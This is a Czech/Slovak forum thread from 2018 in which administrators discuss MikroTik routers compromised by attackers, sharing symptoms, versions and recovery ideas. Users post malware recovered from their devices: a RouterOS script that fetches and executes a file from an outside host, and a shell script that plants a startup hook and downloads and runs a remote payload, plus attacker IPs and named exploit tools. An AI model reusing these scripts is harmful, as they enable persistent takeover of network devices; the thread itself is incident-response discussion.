MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[mpcz]

A v seznamu příkazů v helpu je? mpcz, 3.jul.2018

[Dalibor Toman]

to Dalibor Toman: Ok, něco je asi špatně, BB mám stále v. 1.0. Fdisk tam nevidím. Dalo by se prosím ověřit, jestli tam opravdu je? A jaká verze/datum BB tam má svítit? Dík, mpcz, 3.jul.2018

cast povelu je mampovana na original busybox a cast na novy busybox_p.
po spusteni busybox_p vidis seznam implementovanycvh povelu. Pokud tohle funguje a spusteni fdisku ne tak se napovedlo naaliasovani tech povelu

Kód: Vybrat vše

# fdisk
BusyBox v1.21.1 (2013-07-08 10:56:01 CDT) multi-call binary.
Usage: fdisk [-ul] [-C CYLINDERS] [-H HEADS] [-S SECTORS] [-b SSZ] DISK
Change partition table
        -u              Start and End are in sectors (instead of cylinders)
        -l              Show partition table for each DISK, then exit
        -b 2048         (for certain MO disks) use 2048-byte sectors
        -C CYLINDERS    Set number of cylinders/heads/sectors
        -H HEADS        -S SECTORS


kdys spustim samotny busybox tak hlasi verzi 1.00


zkousel jsem hledat partition tabulky na /dev/mtdXXX ale nikde zadna neni. Tak nevim jak to je s tou flashkou udelane...

[Dalibor Toman]

A v seznamu příkazů v helpu je? mpcz, 3.jul.2018

je, pokud nejde spustit samotny fdisk zkus:
busybox_p fdisk

koukam, ze se mi ty prispevky nejak podarilo domotat (misto editace jsem pridal dalsi ve kterem jsem to snad vysvetlil).

[hapi]

to Hapi: A v jakém stavu bylo zabezpečení / verze ROS? Dík, mpcz, 3.jul.2018

ve špatnym. 6.37.3 nebo co a vše otevřený. Aktuálně vše otevřený s 6.42.5 tak se uvidí.

[mpcz]

to Dalibor Toman: asi ano, protože už mi to docvaklo. To je teda děs, BB píše v 1.00 ale jinde něco jiného. Ten fdisk tam opravdu je a funguje. Dík, mpcz 3.jul.2018

[tulo]

Takze na sieti jeden zabudnuty stary mikrotik s presmerovanou verejnou IP... Prihlásený par dni dozadu niekto cudzí. Čiže heslo odhalené, updatol som to na najnovšiu verziu. V skriptoch bol urobený skript čo vyrobil súbor autosupout1.rif a následne ho scheduler posielal niekam:

​:if ([/file find name=autosupout1.rif]="") do={
:local ssip [:resolve jt.25u.com server=8.8.8.8]
/tool fetch url="http://$ssip:81/autosupout1.rif" dst-path=autosupout1.rif
}
execute [/file get autosupout1.rif contents]

[hapi]

to ale neni celí ne? tohle nevytvoří supout, jenom pokud existuje tak ho někam pošle, pokud neexistuje tak nic. Nemělo to nějaký opakování? chápal bych že to nechal udělat a dal tam scheduler kterej ho pošle až bude hotovej což u rbček může trvat dost dlouho.

Podivnej je ale poslední řádek? co má vůbec udělat?

[tulo]

ten skript som hlupak zmazal...
Bol tam skript, ktorý vyrobil po reboote autosupout1.rif a ten sa sám niekam odoslal pomocou scheduleru.
Zmazal som skript, zmazal som scheduler a zmenil heslo.
V logu bolo vidieť, že bol odoslaný súbor autosupout1.rif

[vencakubik]

Dnes jsem objevil dva případy napadení Mikrotika, kdy to změnilo DNS jak v IP/DNS tak i v nastavením DHCP serveru v networks. Nic víc to zatím neudělalo, není žádná nová partition, žádný skript.
Mám log z jakých IP adres příšly útoky:
89.248.162.169
125.93.148.78

[mpcz]

Ano, to už je klasika. A jako vždy tradiční otázka: verze (od kdy), povolené IP services, filtr na IP správy, atd. ... A z čeho prosím usuzuješ, že tam není, to co píšeš, že tam není? mpcz, 08.jul.2018

[vencakubik]

# rm $0
exec 3>&-
exec 4>&-
exec 5>&-
exec 6>&-
exec 7>&-
exec 8>&-
exec 9>&-
rm /ram/winbox.idx
mkdir /flash/etc/rc.d
mkdir /flash/etc/rc.d/run.d
echo '#!/bin/bash' > /flash/etc/rc.d/run.d/S99own
echo "echo 'usleep 100000000;/flash/rw/store/wget http://141.105.64.212/36/a.sh -O /tmp/a.sh;/bin/bash /tmp/a.sh &' > /tmp/o.sh" >> /flash/etc/rc.d/run.d/S99own
echo "/bin/bash /tmp/o.sh &" >> /flash/etc/rc.d/run.d/S99own
chmod 777 /flash/etc/rc.d/run.d/S99own
mv /flash/rw/pckg/fileinfo /flash/rw/store/wget
chmod 777 /flash/rw/store/wget
/flash/rw/store/wget http://141.105.64.212/36/a.sh -O /tmp/a.sh
bash /tmp/a.sh &

Skript s názvem checkupdate uložený ve files.

[mpcz]

No to už klasika není, asi bych nebyl sám, kdo by rád k tomu nějaký komentář. A také i tu verzi, povolené porty atd. Děkuji. mpcz, 9.jul.2018

[puhy]

Dá se nějak dostat do MK kde ten vir změnil heslo?

[Dalibor Toman]

Dá se nějak dostat do MK kde ten vir změnil heslo?

zkusit WinboxExploit ci MacServerExploit, zda z nej to heslo vymami. Pokud tam je vulnerable verze ROSU, pak by to mohlo vyjit (pokud firewall dovoli). Ale uz jsem videl, ze jmeno/heslo ziskat slo ale prihlaseni pomoci nej nefungovalo

[mpcz]

Základní předpoklad je, stroj nevypínat. U všech strojů, které měly změněné heslo, došlo PO znovupřipojení na napájení k upgrade verze, (na 6.42rc1), z čehož usuzuji, že to asi nepůjde. Bylo by zajímavé zjistit, proč je stroj zaheslovaný a nadále správně funguje. mpcz, 9.jul.2018